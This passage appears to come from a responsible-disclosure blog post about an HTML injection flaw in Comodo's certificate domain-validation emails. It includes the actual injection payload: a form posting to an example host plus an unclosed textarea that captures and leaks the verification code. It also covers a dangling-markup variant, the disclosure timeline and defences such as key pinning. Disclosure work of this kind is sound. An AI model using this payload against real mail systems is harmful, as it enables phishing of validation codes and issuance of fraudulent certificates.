**************PLEASE NOTE CHOOSING THE OPTION BELOW WILL REJECT THE CERTIFICATE**************
...trimmed for brevity...

Peeking at the above raw email we notice that the HTML is not properly being escaped. Additionally, Comodo makes use of a static email boundary of (AlternativeBoundary) which is dangerous because it allows us to inject arbitrary email sections into the email that Comodo sends for domain validation. We’ll ignore the email boundary issue and focus on the HTML injection issue. As it turns out, the Company Name field we saw previously is not length-limited which allows us to inject arbitrary HTML into the end email. We will take advantage of this by setting our Company Name to the following:

<b><u>You have 24 hours to reject this request.</u></b></pre>
<form action="http://example.com/"><button type="submit">Click here to reject this request.</button><textarea style="width: 0px; max-height: 0px;" name="l">

The above HTML will redress the email and start an unclosed <textarea> block which will “swallow” the rest of the email’s HTML with a submit button and form pointing to my website. The following is a screenshot of the email sent to me from Comodo:

7-comodo_email_ssl

As can be seen in the above screenshot the final email has been redressed to state that the user has 24 hours to reject a pending SSL/TLS certificate request. Unknown to the victim however, clicking the button will actually leak the verification code to my own site via <form> submit. Basically, any site owner that receives this email is one click away from allowing an attacker to issue a certificate for their site. This is a basic redress example, since you have arbitrary HTML you could make the entire thing much more convincing. Form submissions are a great way to leak secrets like this because they work in many different mail clients. Even the iPhone’s Mail app supports this functionality:

redacted_iphone_email

Once I’ve leaked the code from the victim in this way, I can then log into the account I created during the certificate request process and download the SSL/TLS certificate. The following is a screenshot of what this looks like:

10-download-certificate

In a real world attack scenario, a malicious actor would forge these emails out to popular websites such as Facebook.com, Google.com, etc in order to snoop on the traffic of their victims. Since the email passes SPF checks and is legitimately from Comodo, a system administrator would have no reason to believe this email is not completely authentic.

Comodo Resellers

One other important thing to note is that resellers of Comodo’s certificates were also affected as well. This risk is amplified because resellers can have a customized HTML header and footer for the verification emails that get sent out. This means that it would be possible for a third party vendor to have a dangling <img> tag in the header combined with a single quote in the footer which would side-channel leak the verification code in the email body (similar to the attack above, but automatic with no user interaction). This style of dangling mark-up injection wasn’t possible in the previously proof-of-concept but is possible for resellers. I was not able to build a proof-of-concept for this however, because I didn’t want to probe further into their reseller system after reporting the initial vulnerability.

Disclosure Timeline

  • June 4th, 2016 – Emailed [email protected] and reached out on Twitter to @Comodo_SSL.
  • June 6th, 2016 – Robin from Comodo confirms this is the correct contact to report security issues, provides PGP key.
  • June 6th, 2016 – Emailed Comodo the vulnerability PGP-encrypted and sent my PGP public key.
  • June 7th, 2016 – Robin from Comodo confirms they understand the bug and state they will work on a fix as soon as possible.
  • June 20th, 2016 – Emailed Comodo for status update.
  • July 1st, 2016 – Outline timeline for responsible disclosure date (90 days from report date per industry standards).
  • July 25th, 2016 – Robin from Comodo confirms a fix has be put in place.

Final Thoughts

Normally, the name of the game when it comes to finding a way to mint arbitrary SSL/TLS certificates is to find the smallest, cheapest, and oldest certificate provider you can. Comodo is the exact opposite of this, they have a 40.6% marketshare and are the largest minter of certificates on the internet. Basically, they are the largest provider of SSL/TLS certificates and yet they still suffer from security issues which would be (hopefully) caught on a regular penetration testing engagement. This paints a grim picture for the certificate authority system. If the top providers can’t secure their systems, how could the smaller providers possibly be expected to do so? It’s a hard game to play since the odds are heavily stacked in the attacker’s favor with tons of certificate authorities all with the power to mint arbitrary certificates. A single CA compromise and the entire system falls apart.

Luckily, we have some defences against this with newer web technologies such as Public Key Pinning which offers protection against attackers using forged certificates. The following is a quote from MSDN about the functionality:

“To ensure the authenticity of a server’s public key used in TLS sessions, this public key is wrapped into a X.509 certificate which is usually signed by a certificate authority (CA). Web clients such as browsers trust a lot of these CAs, which can all create certificates for arbitrary domain names. If an attacker is able to compromise a single CA, they can perform MITM attacks on various TLS connections. HPKP can circumvent this threat for the HTTPS protocol by telling the client which public key belongs to a certain web server.”

https://developer.mozilla.org/en-US/docs/Web/Security/Public_Key_Pinning

This is a fairly powerful mitigation against an attacker with a forged certificate. However, the support is iffy with a lack of support in Internet Explorer, Edge, Safari, and Safari on iOS.

For an alternative system to CA’s, a few ideas have been presented but none have widespread support. One example being Convergence which was presented by Moxie in the talk previously mentioned in this post. However this is only supported by Firefox and I’ve personally never heard of people using it.

Many people like to speak of a certificate authority hack as if it was something only a nation state could accomplish, but just a day’s worth of searching led me to this issue and I don’t doubt that many providers suffer from much more severe vulnerabilities. What happens when your attacker doesn’t care about ethical boundaries and is willing to do much more in-depth testing? After all, this is Comodo, the largest provider. What about the smaller certificate providers? Do they really stand a chance?

Until next time,

-mandatory